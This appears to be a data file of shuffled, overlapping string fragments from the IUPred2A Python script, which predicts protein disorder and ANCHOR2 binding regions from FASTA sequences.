"100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH))",
"SeqIO parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for",
"+ seq[idx + lc + 1:idx + uc + 1]) for aa, freq",
"\\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data directory (default='./') \\t-a -",
"idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1:",
"at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg))",
"= [] k = 0 kk = k + 1 if gr: beg",
"len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm:",
"- uc):max(0, idx - lc)] + seq[idx + lc + 1:idx + uc",
"k = kk kk += 1 if k < nr: beg = gr[k][0]",
"= float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max",
"def aa_freq(_seq): _freq = {} for _aa in _seq: if _aa in _freq:",
"wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else:",
"< 0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] =",
"1 if k < nr: beg = gr[k][0] end = gr[k][1] seq =",
"if val <= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val",
"== \"short\": lc = 1 uc = 25 wc = 10 mtx =",
"1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <=",
"not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output",
"weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1))",
"{}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not",
"= histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq,",
"nr and gr[kk][0] - end < 45: beg = gr[k][0] end = gr[kk][1]",
"{} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score",
"1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score):",
"(iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 *",
"found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2",
"interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain",
"par_b and iupred_scores[idx] < par_c: sign = -1 corr = 0 if iupred_scores[idx]",
"sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory",
"idx in_gr = True if in_gr: gr.append({0: beg, 1: end}) mgr = []",
"sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos +",
"for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]]",
"gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end += 1 if",
"5 par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c",
"not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not",
"of protein disorder as a function of redox state and protein binding #",
"range(idx - wc, idx + wc + 1): if idx2 < 0 or",
"i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] +",
"return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window",
"1: end}) k = kk kk += 1 if k < nr: beg",
"local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)): sign = 1",
"weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line in",
"- wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text",
"try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] =",
"= 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1",
"parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a function of redox",
"posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1]",
"beg = idx end = idx in_gr = True if in_gr: gr.append({0: beg,",
"< nr: if kk < nr and gr[kk][0] - end < 45: beg",
"unweighted_energy_score[idx] += 0 if mode == 'short': for idx in range(len(seq)): for idx2",
"glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] +",
"aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx]",
"weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score =",
"freq except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx]",
"else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]),",
"sequence in sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result",
"= smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob': gr = []",
"len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq) for idx",
"for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a'",
"in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0]",
"(len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] *",
"wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode",
"histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc = 10",
"freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for",
"idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] <",
"= [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] *",
"'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters",
"read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score =",
"len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx -",
"and not in_gr: beg = idx end = idx in_gr = True if",
"in sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result =",
"freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc",
"+ lc + 1:idx + uc + 1]) for aa, freq in freq_dct.items():",
"print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a function of redox state",
"/ (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0]",
"KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx in range(len(seq)): for",
"return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for",
"if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')):",
"for idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx]",
"float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) /",
"range(0, len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i",
"hist = [] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as",
"\".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text += \"Number of",
"= read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn:",
"unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if mode ==",
"41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26",
"sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign =",
"directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if",
"_freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {}",
"weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx",
"= 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c - (par_a",
"+= 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain =",
"idx2 in range(idx - wc, idx + wc + 1): if idx2 <",
"= sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx]",
"\"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \"",
"iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013",
"anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116)))",
"+ 1:idx + uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx]",
"Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple",
"lc = 1 uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo,",
"directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d')",
"enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in sys.argv: print(\"\\t{:.4f}\".format(anchor2_res[pos]), end=\"\")",
"Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) #",
"in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins in",
"25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH))",
"= sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at",
"= par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with",
"100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH))",
"[0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0,",
"local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] *",
"if val > 0.3 and not in_gr: beg = idx end = idx",
"+ 2:idx + local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx]",
"+ seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res += seq[nr:] res",
"- beg + 1 < 35: k += 1 if k < nr:",
"+= seq[nr:] res = \" \".join([res[i:i + 10] for i in range(0, len(res),",
"h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step =",
"in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] +",
"0.26 par_c = 0.43 iupred_limit = par_c - (par_a / par_b) mtx =",
"return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq:",
"data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg)",
"histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30",
"\\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]):",
"<NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction",
"= SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual sequence identifier for",
"i[1] + 1 res += seq[nr:] res = \" \".join([res[i:i + 10] for",
"+ 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in",
"if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] =",
"= 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score =",
"val <= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val >=",
"else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist =",
"# <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type:",
"mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx]",
"len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and",
"+ uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa]",
"[0] * len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct",
"+= mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short':",
"- local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size + 1])",
"with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score =",
"window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\"",
"val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end",
"'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short',",
"return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type)",
"in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq, mode):",
"continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max",
"def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line in file_handler:",
"open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip()",
"= \"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper()",
"= False beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score): if",
"beg, 1: end}) in_gr = False elif in_gr: end += 1 if val",
"mode): if mode == \"short\": lc = 1 uc = 25 wc =",
"[0] * len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct",
"individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a'",
"histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100",
"< par_b and iupred_scores[idx] < par_c: sign = -1 corr = 0 if",
"os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data",
"SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual sequence identifier for posterior",
"= read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc",
"i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val",
"= 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return",
"gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk",
"end < 45: beg = gr[k][0] end = gr[kk][1] kk += 1 elif",
"1: end}) mgr = [] k = 0 kk = k + 1",
"idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] +",
"k < nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1:",
"+ math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__))",
"10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode ==",
"nr = 0 res = \"\" for i in mgr: res += seq[nr:i[0]]",
"= [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] *",
"* len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx",
"[] k = 0 kk = k + 1 if gr: beg =",
"1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1 corr",
"_fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else:",
"in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)])",
"True if in_gr: gr.append({0: beg, 1: end}) mgr = [] k = 0",
"\"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr",
"\" \".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text += \"Number",
"- 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile)",
"at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if",
"> iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c))",
"weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq) for idx in",
"for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError:",
"Options \\t-d str - Location of data directory (default='./') \\t-a - Enable ANCHOR2",
"option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent",
"par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line",
"Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO",
"* len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b",
"sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0])",
"domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res,",
"{}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70))",
"(1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size",
"freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] +=",
"histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc = 100",
"par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] -",
"\"fasta\") for sequence in sequences: # Print individual sequence identifier for posterior parsing",
"for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min =",
"Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences analysis simultaneously sequences",
"idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx",
"if mode == \"short\": lc = 1 uc = 25 wc = 10",
"for sequence in sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\")",
"= 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step =",
"+ 1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26",
"i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if",
"read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\")",
"glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min",
"= gr[kk][1] kk += 1 elif end - beg + 1 < 35:",
"freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if",
"range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx +",
"at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option",
"_line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])",
"if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) >",
"if mode == 'glob': gr = [] in_gr = False beg, end =",
"k += 1 if k < nr: beg = gr[k][0] end = gr[k][1]",
"\"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) <",
"= gr[0][1] nr = len(gr) while k < nr: if kk < nr",
"for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)]",
"histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores):",
"local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size + 1]) for",
"= local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window)",
"parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] ==",
"(h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window):",
"< nr and gr[kk][0] - end < 45: beg = gr[k][0] end =",
"_fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]]",
"support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences:",
"anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"#",
">= histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx]",
"+= 0 if mode == 'short': for idx in range(len(seq)): for idx2 in",
"False beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr",
"function of redox state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic",
"iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if",
"# Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support",
"enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1]",
"-float(\"inf\") with open(histo_file, \"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"): continue",
"histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc =",
"= 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step =",
"2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) *",
"+= _line.strip() return _seq def iupred(seq, mode): if mode == \"short\": lc =",
"output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as",
"seq[idx + 2:idx + local_window_size + 1]) for aa, freq in freq_dct.items(): try:",
"15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc =",
"iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] *",
"elif end - beg + 1 < 35: k += 1 if k",
"idx - lc)] + seq[idx + lc + 1:idx + uc + 1])",
"- par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b)",
"= 1 uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min,",
"idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\"",
"+ 1].upper() nr = i[1] + 1 res += seq[nr:] res = \"",
"* freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores",
"_mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = []",
"file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found",
"as a function of redox state and protein binding # <NAME>, <NAME>, <NAME>",
"in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return",
"= read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc",
"nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0",
"globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text +=",
"res = \" \".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text",
"for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score",
"len(gr) while k < nr: if kk < nr and gr[kk][0] - end",
"nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k",
"_freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for _line",
"_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\")",
"= float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return hist, h_min,",
"seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res += seq[nr:]",
"smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] =",
"{} with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if _line.split()[0] in",
"\"r\") as _fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] =",
"> h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist))",
"aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc + 1:idx",
"res = \"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] +",
"Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if",
"1)] + seq[idx + 2:idx + local_window_size + 1]) for aa, freq in",
"sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] =",
"end}) k = kk kk += 1 if k < nr: beg =",
"+= 1 if k < nr: beg = gr[k][0] end = gr[k][1] seq",
"h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in",
"math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg",
"\"short\": lc = 1 uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH))",
